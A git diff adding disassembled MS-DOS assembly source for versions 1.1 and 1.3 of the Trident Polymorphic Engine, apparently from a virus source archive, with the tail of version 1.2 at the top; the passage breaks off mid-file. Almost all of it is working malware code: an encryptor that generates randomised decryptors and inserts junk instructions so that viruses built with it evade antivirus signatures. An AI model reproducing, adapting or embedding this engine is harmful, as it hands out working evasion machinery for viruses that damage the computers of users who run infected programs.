+rnd_l2: loop rnd_lup + pop bx + +move_rnd: mov word ptr ds:[rnd_get+4],ax + mov word ptr ds:[rnd_get+7],dx + mov al,dl + pop cx + pop dx + ret + + +;**************************************************************************** +;* tables for engine +;**************************************************************************** + + ; AX AL AH (BX) BL BH CX CL CH +mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5 + + ; nop clc stc cmc cli cld incbp decbp +nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh + + ; or and xchg mov +nop_data16 db 8, 20, 84, 88 + + ; bl/bh, bx, si di +dir_change db 07, 07, 04, 05 +ind_change db 03, 03, 06, 07 + + + ; xor xor add sub +how_mode db 30, 30, 00, 28 + + ; ? add xor or +add_mode db 0, 0C8, 0F0, 0C0 + +tpe_bottom equ $ + + end TPE12 diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm new file mode 100644 index 00000000..bbded297 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm @@ -0,0 +1,1009 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.3 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.3 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put betwen decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor = +; DI Length of decryuptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + +.model tiny +.code + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + + + org 100h + +tpe_top equ $ + db '[ MK / TridenT ]' ;Encryptor name +crypt: + push ds ;save registers + push dx + push si + push cs + pop ds + call TPE_13 + +TPE_13: + pop si + sub si,offset TPE_13 ;get delta offset + + xor di,di ;di=start of decryptor + mov byte ptr flags[si],al + test al,08 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_not_0 ;get encryption value + mov word ptr xor_val[si],ax ;store it + + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,07 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instructions in a + and ax,000fh ; random order + cmp al,0ah + ja mov_lup + mov word ptr store_mov[si],ax ; Why???? + push cx ;test if MOV already done + xchg ax,cx + mov ax,0001h + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20h ;carry with ADD/SUB? + je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset[si],0000h + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr flags[si],08 ;insert POP AX?? + je no_pop + mov al,58h + stosb + +no_pop: + mov ax,di ;calculate loop offset + add ax,bp + pop dx + add ax,dx + sub ax,word ptr xor_offset[si] + push di + mov di,word ptr where_len[si] + test bl,0ch ;are BL,BH used for encryption? + jne v2 + mov byte ptr es:[di],al + mov di,word ptr where_len2[si] + mov byte ptr es:[di],ah + jmp short v3 + +v2: + mov word ptr es:[di],ax + +v3: + pop di + mov dx,word ptr xor_val[si] + mov bp,word ptr add_val[si] + pop si ;ds:si=start of code + pop ds + push di ;save pointer to encrypted code + push cx ;save length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=length decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr. code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,bp + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,word ptr mov_byte[si] + push bx + mov bx,dx + mov al,byte ptr mov_here[bx+si] + + pop bx + cmp dl,04 ; bx??? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ; a*? + pushf + jne is_not_a + test bl,80h ; a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ; insert the MOV + popf ; a* + jne is_not_a2 + mov ax,word ptr xor_val[si] + jmp short sss + +is_not_a2: + test dl,08 ; b*? + jne is_not_b + push bx + lea bx,word ptr where_len[si] + test dl,02 + je is_not_bh + add bx,02 + +is_not_bh: + mov word ptr [bx],di + pop bx + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encryption? + je sss + inc ax ;only half the number of bytes + shr ax,1 + +sss: + test dl,03 ;byte or word register? + je is_x + test dl,02 ;*h? + je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,03 ;use alternative for MOV? + je no_alter + + push ax + and bx,0fh + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,07 + mov cl,09 + xchg ax,cx + mul cl + + add ax,30c0h + xchg ah,al + test bl,04 + je no_sub + mov al,28h +no_sub: call maybe_2 + stosw + + mov al,80h + call maybe_2 + stosb + + xchg ax,bx + and ax,0003h + lea bx,word ptr alt_code[si] + xlat ;AL = DS:[BX+AL] + add al,cl + +no_alter: stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,XXXX ----------------------------------- + +do_add_ax: + push cx + mov word ptr add_val[si],0 ;save ADD value here + + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,03 + div cl + or ah,ah + jne no_add_ax ;use ADD? + + test bl,80h + jne do_81C2 ;AX or DX? + mov al,05 + stosb + jmp short do_add0 + +do_81C2: mov ax,0c281h + stosw + +do_add0: call rnd_get + mov word ptr add_val[si],ax + stosw + +no_add_ax: pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr flags[si],01 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,08 + jne yyyy + stosb + retn + +yyyy: or al,80h + stosb + call rnd_get + stosw + mov word ptr xor_offset[si],ax + retn + +xor1: mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr xor_val[si] + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,08 ;no CMPSW/SCASW if BX is used + je da0 + test bh,02 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + + +da0: test bh,04 ;ADD/SUB or INC/DEC? + je add1 + mov al,40h ;INC/DEC + +add0: + call add_ind + stosb + test bl,10h ;byte or word? + je return + stosb ;same instruction again + +return: retn + +add1: test bh,40h ;ADD/SUB + je no_clc2 ;carry?? + mov al,0f8h ;insert CLC + stosb + +no_clc2: mov al,83h + stosb + mov al,0c0h + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +do_cmpsw: test bh,04 ;CMPSW or SCASW + je normal_cmpsw + test bl,04 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: mov al,0a6h + jmp short save_it + +do_scasw: mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne cx_loop + mov al,0e0h ;LOOPNZ or LOOP? + test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,02 + +l10: stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: test bh,10h ;SUB CX or DEC CX?? + jne cxl_dec + mov al,83h + stosb + call rnd_get + test al,01 + jne b062c9 + mov ax,01e9h + jmp short asdfasdf + +b062c9: mov ax,0ffc1h + +asdfasdf: stosw + jmp short do_jne + +cxl_dec: mov al,49h + stosb + +do_jne: call rnd_get + test al,01 + mov al,7fh + jne l10 + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + push di + lea di,word ptr dir_change[si] + jmp short xx1 + +add_ind: + push di + lea di,word ptr ind_change[si] + +xx1: push bx + shr bl,1 + shr bl,1 + and bx,03 + add al,byte ptr [bx+di] + pop bx + pop di + retn + +;--- mov encryption command byte to AL -------------------- + +get_xor: + push bx + xchg ax,bx + and ax,0003h + lea bx,word ptr how_mode[si] + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,02 ;ADD/SUB used for encryption? + je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this + cmp al,81h + je maybe_not + push ax + call rnd_get + test al,01 + pop ax + je maybe_not + add al,02 + +maybe_not: retn + +;--- insert random instructions --------------------------- + +do_junk: + test byte ptr flags[si],04 + je no_junk + call rnd_get ;put a random number of + and ax,000fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop + +no_junk: retn + +;--- Insert random nop (or not) --------------------------- + +do_nop: + test byte ptr flags[si],02 + +yes_nop: je no_nop + call rnd_get + test al,03 + je nop8 + test al,02 + je nop16 + test al,01 + je nop16x + +no_nop: retn + +;--- get rough random nop (may affect register values ----- + +junk: + call rnd_get + and ax,001eh + jmp short aa0 + +nop16x: call rnd_get + and ax,0006h + +aa0: push bx + xchg ax,bx + call rnd_get + mov bx,word ptr junk_cals[bx+si] + add bx,si + call bx + pop bx + retn + +;--- NOP and junk addresses ------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;--- NOP and junk routines -------------------------------- + +nop16x0: + add byte ptr [si],cl ; J* 0000 (conditional) + jo yes_nop ; Jump on Overflow + retn + +nop16x1: + mov al,0ebh ; JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convrt AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ; XCHG AX,reg /XCHG AX,reg + stosb + retn + +nop16x3: + call junkF ; INC/DEC or DEC/INC + xor al,08 + stosb + retn + +nop8: + push bx + and al,07 + lea bx,word ptr nop_data8[si] + xlat ; AL = DS:[BX+AL] + stosb + pop bx + retn + +nop16: push bx + and ax,0303h + lea bx,word ptr nop_data16[si] + xlat ; AL = DS:[BX+AL] + add al,ah + stosb + call rnd_get + and al,07 + mov bl,09 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h ;CALL xxxx / junk / POP reg + and ah,0fh + inc ah + stosw + xor al,al + stosb + xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,07 + call no_sp + mov cx,ax + or al,58h + stosb + + test ch,03 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ; insert XCHG SI,reg + or ah,cl + test ch,08 + je j6_1 + mov al,8bh + +j6_1: stosw + call do_nop + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,08 + call do_xor + +junk6_ret: pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,08 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8/16),r/m + or al,02 + and ah,3fh + test al,01 + je junk9_ret + or ah,0c0h + +junk9_ret: call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,01 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,01 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,09 ;CMPS* or SCAS* + test ah,01 + je mov_test + or al,0a6h + and al,0feh + stosb + retn + +mov_test: or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_not_0 + dec ax + popf + jmp short byte_word + +junkD: + and al,07 ; XCHG AX,reg + or al,90h + call no_sp + stosb + retn + + +junkE: + and ax,0307h + or ax,5850h + stosw + retn + +junkF: + and al,0fh ; INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word ------------------------------- + +byte_word: je only_byte + stosw + retn + +only_byte: stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,07 + cmp al,04 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: retn + +;--- don't use [bp+..] ------------------------------------ + +no_bp: + test ah,04 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: push ax + and ah,07 + cmp ah,06 + pop ax + jne no_bp_ret + or ah,01 + +no_bp_ret: retn + +;--- write byte for JMP/CALL and fill with random bullshit + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call rnd_init0 + and ax,000fh + inc ax + xchg ax,cx + +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + + pop cx + pop ax + retn + +rnd_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ; get time CH,CL:DH,DL + in al,40h ; timer + mov ah,al + in al,40h ; timer + + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_not_0: + call rnd_get + or ax,ax + je rnd_not_0 + retn + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h ;timer + add ax,0000h ;ERROR: should be MOV ax,0 + mov dx,0000h + mov cx,0007h + +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: loop rnd_lup + pop bx + +move_rnd: push si + call mov_rnd2 + +mov_rnd2: + pop si + mov word ptr cs:[si-1Bh],ax ; [si-(rnd_get+4)] + mov word ptr cs:[si-18h],dx ; [si-(rnd_get+7)] + pop si + mov al,dl + pop cx + pop dx + retn + +;--- TABLES FOR ENGINE ------------------------------------ + +mov_byte: db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,BL,BH,.. + db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 8,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 7,7,4,5 ;BL/BH,BX,SI,DI + +ind_change db 3,3,6,7 ;BL/BH,BX,SI,DI + +how_mode db 30,30,0,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c0f0, 0c800 ;????, ADD AL,CL + +add_val dw 00 +xor_val dw 00 +xor_offset dw 00 +where_len dw 00 +where_len2 dw 00 +store_mov dw 00 +mov_here = $-1 +flags db 00 + +ID_Bytes db '[TPE 1.3]' +tpe_bottom equ $ + + end crypt + diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm b/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm new file mode 100644 index 00000000..e6702ac6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm @@ -0,0 +1,1028 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put between decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work Segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor (preserved) = +; DI Length of decryptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + + .model tiny + .code + org 0 + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + +tpe_top equ $ + db '[ MK / TridenT ]' ;encryptor name + +crypt: + xor di,di + call dword ptr ds:[5652h] ;???? + push cs ;save registers + pop ds + mov byte ptr flags,al + test al,8 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_get ;get encryption value + or al,al ;is it a 0? + je random ;redo it if it is + mov word ptr xor_val,ax ;store non-zero encryptor + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,7 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instrucions in a + and ax,0fh ; random order + cmp al,0ah + ja mov_lup + mov si,ax ; + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + push dx + call do_mov + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;ADD AX for loop + call do_nop + test bh,20h ;carry with ADD/SUB? + je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset,0 + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr store_mov,8 ;insert POP AX? + je no_pop + mov al,58h + stosb + +no_pop: + xor ax,ax + test bh,01 + je no_pop2 + mov ax,cx + dec ax + test bl,10h + je no_pop2 + and al,0feh + +no_pop2: + add ax,di ;calculate loop offset + add ax,bp + pop si + add ax,si + sub ax,word ptr xor_offset + mov si,word ptr where_len + test bl,0ch ;are BL,BH used for encryption? + jne v2 + mov byte ptr es:[si],al + mov si,word ptr where_len2 + mov byte ptr es:[si],ah + jmp short v3 + +v2: + mov word ptr es:[si],ax + +v3: + mov dx,word ptr xor_val + pop si ;ds:si=start of code + pop ds + push di ;save pointer to start of code + push cx ; and length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=lenth decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,word ptr cs:add_val + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,si + mov al,byte ptr ds:mov_byte[si] + cmp dl,04 ;bx? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ;a*? + pushf + jne is_not_a + test bl,80h ;a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ;insert the MOV A* + popf + jne is_not_a2 + mov ax,word ptr ds:xor_val + jmp short sss + +is_not_a2: + test dl,08 ;b*? + jne is_not_b + mov si,offset where_len + test dl,2 + je is_not_bh + add si,2 + +is_not_bh: + mov word ptr [si],di + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encrypt? + je sss + inc ax ;only 1/2 the number of bytes + shr ax,1 + +sss: + test dl,3 ;byte or word register? + je is_x + test dl,2 ;*h? + je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + je no_alter + push ax + and bx,0fh + and al,8 + shl ax,1 + or bx,ax + pop ax + and al,7 + mov cl,9 + xchg ax,cx + mul cl + add ax,30c0h + xchg ah,al + test bl,4 + je no_sub + mov al,28h + +no_sub: + call maybe_2 + stosw + mov al,80h + call maybe_2 + stosb + lea ax,word ptr alt_code + xchg ax,bx + and ax,3 + xlat + add al,cl + +no_alter: + stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,xxxx ----------------------------------- + +do_add_ax: + push cx + lea si,add_val + mov word ptr [si],0 ;save ADD val + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jne no_add_ax ;use ADD? + test bl,80h + jne do_81C2 ;AX or DX? + mov al,5 + stosb + jmp short do_add0 + +do_81C2: + mov ax,0c281h + stosw + +do_add0: + call rnd_get + mov word ptr [si],ax + stosw + +no_add_ax: + pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr ds:flags,1 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: + test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,8 + jne yyyy + stosb + retn + +yyyy: + or al,80h + stosb + call rnd_get + stosw + mov word ptr ds:xor_offset,ax + retn + +xor1: + mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:xor_val + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,8 ;no CMPSW/SCASW if BX is used + je da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + +da0: + test bh,4 ;ADD/SUB or INC/DEC? + je add1 + mov al,40h ;INC/DEC + test bh,01 + je add0 + add al,8 + +add0: + call add_ind + stosb + test bl,10h + je return + stosb + +return: + retn + +add1: + test bh,40h ;ADD/SUB + je no_clc2 ;carry? + mov al,0f8h ;insert CLC + stosb + +no_clc2: + mov al,83h + stosb + mov al,0c0h + test bh,01 + je b0627f + mov al,0e8h ;insert XXX + +b0627f: + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: + call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +b06293: + test bh,01 + je do_cmpsw + mov al,0fdh ;add XXX + stosb + +do_cmpsw: + test bh,4 ;CMPSE or SCASW? + je normal_cmpsw + test bl,4 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: + mov al,0a6h + jmp short save_it + +do_scasw: + mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne do_loop2 + call rnd_get + test al,01 + jne cx_loop + +do_loop2: + mov al,0e0h ;LOOPNZ or LOOP? + test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,2 + +l10: + stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: + test bh,10h ;SUB CX or DEC CX? + jne cx1_dec + mov ax,0e983h + stosw + mov al,1 + stosb + jmp short do_jne + +cx1_dec: + mov al,49h + stosb + +do_jne: + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + lea si,word ptr dir_change + jmp short xx1 + +add_ind: + lea si,word ptr ind_change + +xx1: + push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr [bx+si] + pop bx + retn + +;--- move encyryption command byte to AL ------------------ + +get_xor: + push bx + lea ax,word ptr how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,2 ;ADD/SUB used for encryption + je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: + retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: + retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this... + cmp al,81h + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + je maybe_not + add al,2 + +maybe_not: + retn + +;--- insert random instructions --------------------------- + +do_nop: + test byte ptr ds: flags,2 + +yes_nop: + je no_nop + call rnd_get + test al,3 + je nop8 + test al,2 + je nop16 + +b0633b equ $+01h + test al,1 + je nop16x + +no_nop: + retn + +;--- insert random nop (or not) --------------------------- + +do_junk: + test byte ptr ds:flags,4 + je no_junk + call rnd_get ;put a random number of + and ax,0fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx + +junk_loop: + call junk + loop junk_loop + +no_junk: + retn + +junk: + call rnd_get + and ax,01eh + jmp short aa0 + +nop16x: + call rnd_get + and ax,6 + +aa0: + xchg ax,si + call rnd_get + jmp word ptr ds:junk_cals[si] + + +;----------------------------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;----------------------------------------------------- + +nop16x0: + add byte ptr [si],cl ;J* 0000 (conditional) + jo yes_nop ;jump on overflow + retn + +nop16x1: + mov al,0ebh ;JMP xxxx/junk + and ah,7 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convert AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ;XCHG AX,reg/XCHG AX,reg + stosb + retn + +nop16x3: + call junkF ;INC/DEC or DEC/INC + xor al,8 + stosb + retn + +nop8: + push bx + and al,7 + lea bx,word ptr nop_data8 + xlat + stosb + pop bx + retn + +nop16: + push bx + and ax,0303h + lea bx,word ptr nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h + and ah,0fh ;CALL xxxx/junk/POP reg + inc ah + stosw + xor al,al + stosb + xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58h + stosb + test ch,3 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ;insert XCHG SI,reg + or ah,cl + test ch,8 + je j6_1 + mov al,8bh + +j6_1: + stosw + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,8 + 